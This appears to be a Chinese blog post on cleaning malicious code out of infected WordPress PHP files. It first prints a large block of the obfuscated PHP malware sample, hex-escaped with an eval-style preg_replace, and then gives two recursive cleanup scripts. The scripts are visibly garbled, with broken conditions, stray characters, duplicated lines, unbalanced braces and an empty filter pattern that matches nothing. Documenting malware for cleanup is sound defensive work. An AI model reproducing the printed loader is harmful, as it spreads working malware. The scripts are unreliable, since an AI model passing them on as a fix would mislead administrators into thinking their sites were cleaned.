清除wordpress裡PHP檔案惡意程式碼

公司一些wordpress網站由於下載的插件存在惡意程式碼，導致整個伺服器所有網站PHP檔案都存在惡意程式碼，就寫了個簡單的腳本清除。

!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]621:|:*mmvo:>:iuhofm %x5c%x7825:-5ppde:4:|:**#ppde#)tutjyfx25yy>#] D6]281L1#%x5c%x782f#M5]DgP5]D6#!#]y81]273]y>#]D4]273]D6P2L5P6]y6gP7L6M75]D:D ]Df#^#zsfvrx5c% x7827&6hmg%x5c%x7825!j%%x5c% x7825:|:**t%x5c%xW~!%x5c%x7825z!>215b:%x5c%x7825s:%x5cw>#]y74]273]y76]252]y85]256]y6g] **3-j%x5c%x7825-bubE{ h%x5c%x7825)sutMSVD!-id%x5c%x7825)uqpI,67825mm!> !#]y81]273]y76]258]y6g]273]#*%x5c%x7824-%x5c%x7824!>!tus%x5x782fq%x5c%x7825>2q%x5c%x7825%x5c%x782frfs8325677256272567256212525125725725725251257225725722572572572； 78]248 ] y83]7825t2w)##Qtjw) #]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c'pd%x5c%x78256!%x5c%x7824c%x7825c!>!%x5c%x7825i%x5c%x785c2^n%x5c%x7825!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-x25) x7825=*h%x5c%x78254%x5c%x785c%x5c%x7825j^%x527,*e%x5c%x7827,*d%x5c%x7827,*cmfV%x5c%x787fu%x5c%x!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7or_reporting(0); preg_replace("%x2f%ggg)(0)%x5c%x782f *0f(-!#]y76]277]y72]265]y76]258]y6g]273]y76]271]y7d]25%x5c%O8255hx5c%Ohx x5c%x782f#00#W~!%x5c%xS["%x61 6%x75 6%x61"]=1 函數f:h%x5c%x7825:!2p%x5c2fh%x5c%x7825:%x5c%x7825fdyUm%x5c%x5c%x7825 !qp%x5c%x7825!|Z~!!2p%x5c%x7825!!*5* #P#-#Q#-#B#-#T#-#E#-#G#-#x787fw6*%x5c%x787f_*#fmjgk4 %x5*WCw*[!%x5c%x7825rN}#QwTW%xc%x7825 % x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#50%x2eR%x29W%x65","%x65 6%x61 4%x28 1%x6d 0%x6c%) opjudovg) op e%x5c%x7825!osvufs!*! A!>!{e%x5cx27pd%x5c%x78256>X)!gjZb%x5c%x7825!**X)ufttj%x7825c:>11%x5c%x782272qj%x5c%x7825)7gjq }_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>x7825!>}R;msv}.;%x5c%x782f#% xc%x#78b% x5c%x7825w:!>!%x5c%x78246767~6>%x5c%|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|! **#j{hnpd#)tujQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x78!2p%x5c%x78uft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd} ;!>!}27%; !>>6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7860ufldpt}X;%x5c%x78#%x5c%x785cq%x5c%x7257 x5c%x785cq%x5c%x7825)uftc%x7825tpz!>!#]D6M7]K3#}>!%x5c%x7825tdz)% x5c%x7825ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782560msvd}R;*msv%x5c%.78% x7860UQP78W~!Ypp2)%x5c%x7825zB%x5c%x7825z> ;!tussfw)%x5c%x7825zW%x55c%x787fw6s%x5c%x7825q5c%x7825)!gj!2bd%x5c%x7825!2qj%x5c%x78257-K)udfoopdXA%x54?*2b%x5c%x7825)gpf{jt)!gj!:946e:555 - tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]KC#>2*!% x5c% x7825z >3j%x5c%x7825!*72!%x5c%x7827!hmg%x-t.98]K4]65]D8]86]y31]278]y3f]5c%x78605 x7825 %x5c%x7824-%x5c%x7%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!!#]y84]275]y83]248]y83]256c%x7825V%x5c%x7827{ftmfV%x5c%x787f%x5c%x72f7f725 :*r%x5c%x7825:-t%x5c%x7825)3of:opjud7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!! )qj3hopmA%x578Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78782fqp%x5c%x7825>5h%x5c%4-%x5c%x724x %x7860cpg]273]y76]271]y7d]252]y74]256]7f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!} W;utpi }Y;tuofuopd%x5c%x7tsbqA7>q%x5c%x78256 %x5c%x7897e:56-%x5c%x7878r.985:52985c%x7825kj:-!OVMM*#L4]275L3]248L3P6L1M5]D2P4]D6#>1*!%x5c%x7825b:]y4c#!%x5c% x7824Ypp 5c%!x7825cB%x5c% x7824Ypp 64993f 69495:564959694095. #)zbssb!>!ssbnpe_GMFT%x5%cbe&c5%Ix5%x785__ 5c%x787f!bjepdoF.uofux#xD785c) %x5c %x7878{**#cvt-ovww)ldb6%* )utjm!|%x5c-%x7824 x5c%x7824!>!fyqmpef)#%x5c%x7824* >*4-1-bubE{h%x5c%x7255) )!gj!5)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd% x5c%x7%x7825c*W%x5c%x7825eN # Qi%x5c%x785c1^W%x25%; !%x5c%x7827!hmg%x5c%x7825)!gj!~!%x5c%x782400x782400x7 :Ew:Qb:Qc:]37825_t %x785c^>Ew:Qb:Qc:]323]78363]78363]23833] ]6] 283]2178}527}88:}334}472%x55c% x7825hIr%x5c% x785c1^-%x5c%x7825r%x5c%x785c2^-5c%x782f%15 ;%x5c %x7825-qp%x5c%f*x7%xp7825) %x5c%x782f#)rrd%x5c%x782f#00;quui#>.5j:>1!#]y84]275]y83]273]y76]2777%#75c% % x825c25b%t2 x5c%x785csboe))1%x5c%x78-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:62b%x5cx25%x5c%x7827Y%x5c%x78256<.msv>H72554%Ex4%d 2 4 %x78b%x35 5%x3 6%x21v %x5fdy)##-!#~22#]y3g]61]y3f]63]y3:]68]y76#

/**
 * 檔案名稱：delUnwantedCode.php
 * 功能：刪除FTP裡惡意程式碼
 * 使用說明：
 * 請將檔案上傳到需要清除惡意程式碼的目錄，然後透過CLI或瀏覽器存取即可，原有被感染的檔案會自動備份
*/


$path = dirname(__FILE__); #定義需要處理的目錄
$bak_path = $path.DIRECTORY_SEPARATOR.basename(__FILE__,'.php'); #定義來源檔案備份目錄，程式過濾惡意程式碼前，先按原有的路徑備份文件到此目錄
$fileType = array('php'); #定義需要處理的檔案類型（後綴名稱），小寫
$search = array('@@si'); #定義需要過濾的惡意程式碼規則
$search_count = array(
 'all_file'=> array(), #所有檔案
 'search_file0'=>array(), #沒有惡意程式碼檔案
 'search_file1'=>array() #含有惡意程式碼檔案
);


$filelist = listDir($path,$fileType,false); #讀取目錄裡符合條件檔案清單
if(!empty($filelist)){
 foreach ($filelist as $file ){
 $file = (isset($file['name'])?$file['name']:$file);
 $search_count['all_file'][] = $file;
 $fileContent = file_get_contents($file);
 $compile_fileContent = preg_replace($search, '', $fileContent);
 if(strlen($fileContent) != strlen($compile_Content) && 字符串_Content) &$ , '', $file)==$file){
 #過濾後檔案長度不一致，則表示含有惡意程式碼（備份檔案所在目錄不過濾）
 $search_count['search_file1'][] = $ file;

 ############備份原有檔案開始##############
 $bakFile = str_replace($path , $bak_path, $file);
 @make_dir(dirname($bakFile));
 @file_put_contents($bakFile, $fileContent);
 ############備份備份原有檔案結束###############

 #重新寫入過濾後的內容到原有的PHP檔案
 @file_put_contents($file, $compile_fileContent );
 }else{
 $search_count['search_file0'][] = $file;
 }
 }
}

#print_r($search_count);die ;
echo sprintf('從%s里共搜尋到%s個符合條件的文件，其中%s個存在惡意程式碼，已處理結束',$path,count($search_count['all_file']), count($search_count['search_file1']));die;
























############## ##########
## 輔助函數
########################

 /**
 * 檢查目標資料夾是否存在，如果不存在則自動建立該目錄
 *
 * @access public
 * @param string folder 目錄路徑。不能使用相對於網站根目錄的URL
 *
 * @return bool
*/
function make_dir($folder){
 $reval = false;
 if (!file_exists($folder)){
 #如果目錄不存在則嘗試建立該目錄
 @umask(0);

 #將目錄路徑拆分成數組
 preg_match_all('/([^/]*)/?/i', $folder, $atmp );

 #如果第一個字元為/則當作物理路徑處理
 $base = ($atmp[0][0] == '/') ? '/' : '' ;

 #遍歷包含路徑資訊的陣列
 foreach ($atmp[1] AS $val){
 if ('' != $val){
 $base .= $ val;
 if ('..' == $val || '.' == $val){
 #如果目錄為.或..則直接補/繼續下一個循環
 $base .= '/';
 continue;
 }
 }else{
 continue;
 }

 $base .= '/';


 $base .= '/';

 if (!file_exists($base)){
 #嘗試建立目錄，如果建立失敗則繼續循環
 if (@mkdir(rtrim($base, '/'), 0777)){
 @ chmod($base, 0777);
 $reval = true;
 } } } }else{ #路徑已經存在。返回該路徑是不是目錄
 $reval = is_dir($folder);
 }

 clearstatcache();

 return $reval;
}
}
 return $reval;
}
}


########取得目錄下所有文件，包括子目錄開始###############
function listDir($path,$ fileType=array(),$fileInfo=true){
 $path = str_replace(array('/','\'), DIRECTORY_SEPARATOR, $path);
 if(!file_exists($path)|| !is_dir($path)){
 return '';
 }
 if(substr($path, -1,1)==DIRECTORY_SEPARATOR){
 $path = substr($path, 0,-1);
 }
 $dirList=array();
 $dir=opendir($path);
 while($file=readdir($dir)){
 #若有定義$fileType，且檔案類型不在$fileType範圍內或檔案是目錄，則跳過
 if($file!=='.'&&$file!=='..'){
 $file = $path.DIRECTORY_SEPARATOR.$file;
 if(is_dir($file)){
 if(empty($fileType)){
 $dirList[] = ($fileInfo== true?array('name'=>$file,'isDir'=>intval(is_dir($file))):$file);
 }
 $dirList = array_merge($dirList,listDir($file ,$fileType));
 }elseif(!empty($fileType) && (in_array(pathinfo($file, PATHINFO_EXTENSION), $fileType))){
 $dirList[] = ($fileInfo==true ?array('name'=>$file,'isDir'=>intval(is_dir($file)),'md5_file'=>md5_file($file),'filesize'=>filesize($file),'filemtime' =>filemtime($file)):$file);
 }
 };
 };
 closedir($dir);

複製程式碼

/**
 * 檔案名稱：delAllUnwantedCode.php
 * 功能：刪除FTP裡惡意程式碼(支援任意數量的檔案處理)
 * 使用說明：
 * 請將檔案上傳到需要清除惡意程式碼的目錄，然後透過CLI或瀏覽器存取即可，原有被感染的檔案會自動備份
*/
set_time_limit(0);ignore_user_abort(true);

$path = dirname( __FILE__); #定義需要處理的目錄
$bak_path = $path.DIRECTORY_SEPARATOR.basename(__FILE__,'.php'); #定義原始檔備份目錄，程式過濾惡意程式碼前，先按原有的路徑備份文件到此目錄
$fileType = array('php'); #定義需要處理的檔案類型（後綴名），小寫
$search = array('@@si'); #定義需要過濾的惡意程式碼規則
$file_count = array(
 'all_file'=>0, #所有檔案
 'filter_file'=>0 #含有惡意程式碼檔案
);

replaceUnwantedCode($path); #執行過濾

#print_r($search_count);die;
echo sprintf('從%s里共搜尋到%s個符合條件的文件，其中%s個存在惡意程式碼已清理，原始檔案保存在%s',$path, ($file_count['all_file']), ($file_count['filter_file']), $bak_path);die;



function replaceUnwantedCode($path ){
 global $bak_path,$fileType,$search,$file_count;
 $path = str_replace(array('/','\'), DIRECTORY_SEPARATOR, $path);
 if(!file_exists ($path)||!is_dir($path)){
 return '';
 }
 if(substr($path, -1,1)==DIRECTORY_SEPARATOR){
 $path = substr($path, 0,-1);
 }
 $dir=opendir($path);
 while($file=readdir($dir)){
 #若有定義$fileType，且檔案類型不在$fileType範圍內或檔案是目錄，則跳過
 if($file!=='.'&&$file!=='..'){
 $file = $path.DIRECTORY_SEPARATOR.$file;
 if(is_dir($file)){
 replaceUnwantedCode($file);
 }elseif(!empty($fileType) && (in_$array(pathinfo(path) , PATHINFO_EXTENSION), $fileType))){
 ################################
 @$ file_count['all_file'] ;
 $fileContent = file_get_contents($file); #檔案原始程式碼
 $compile_fileContent = preg_replace($search, '', $fileContent); #過濾後的內容
 if (strlen($fileContent) != strlen($compile_fileContent) && str_replace($bak_path, '', $file)==$file){
 #過濾後檔案長度不一致，則表示含有惡意程式碼（備份檔案所在目錄不過濾）
 $file_count['filter_file'] ;

 ###########備份原有檔案開始############# ###
 $bakFile = str_replace($path, $bak_path, $file);
 @make_dir(dirname($bakFile));
 @file_put_contents($bakFile, $fileContent);
 @file_put_contents($bakFile, $fileContent);

 ############備份原有檔案結束################

 #重新寫入過濾後的內容到原有的PHP檔
 @file_put_contents($file, $compile_fileContent);
 }
 ################################################################################# ####
 unset($fileContent,$compile_fileContent);
 }
 };
 };
 closedir($dir);
 return true;
}





########################
## 輔助函數
########################

/**
 * 檢查目標資料夾是否存在，如果不存在則自動建立該目錄
 *
 * @access public
 * @param string folder 目錄路徑。不能使用相對於網站根目錄的URL
 *
 * @return bool
*/
function make_dir($folder){
 $reval = false;
 if (!file_exists($folder)){
 #如果目錄不存在則嘗試建立該目錄
 @umask(0);

 #將目錄路徑拆分成數組
 preg_match_all('/([^/]*)/?/i', $folder, $atmp);

 #如果第一個字元為/則當作實體路徑處理
 $base = ($atmp[0][0] == '/') ? '/' : '';

 #遍歷包含路徑資訊的陣列
 foreach ( $atmp[1] AS $val){
 if ('' != $val){
 $base .= $val;
 if ('..' == $val || '. ' == $val){
 #如果目錄為.或..則直接補/繼續下一個循環
 $base .= '/';
 continue;
 }
 } else{
 continue;
 }

 $base .= '/';

 if (!file_exists($base)){
 #嘗試建立目錄，如果創建失敗則繼續循環
 if (@mkdir(rtrim($base, '/'), 0777)){
 @chmod($base, 0777);
 $reval = true;
 }
 }
 }
 }else{
 #路徑已經存在。返回該路徑是不是目錄
 $reval = is_dir($folder);
 }

 clearstatcache();

 return $reval;

}

複製程式碼

惡意程式碼, wordpress, PHP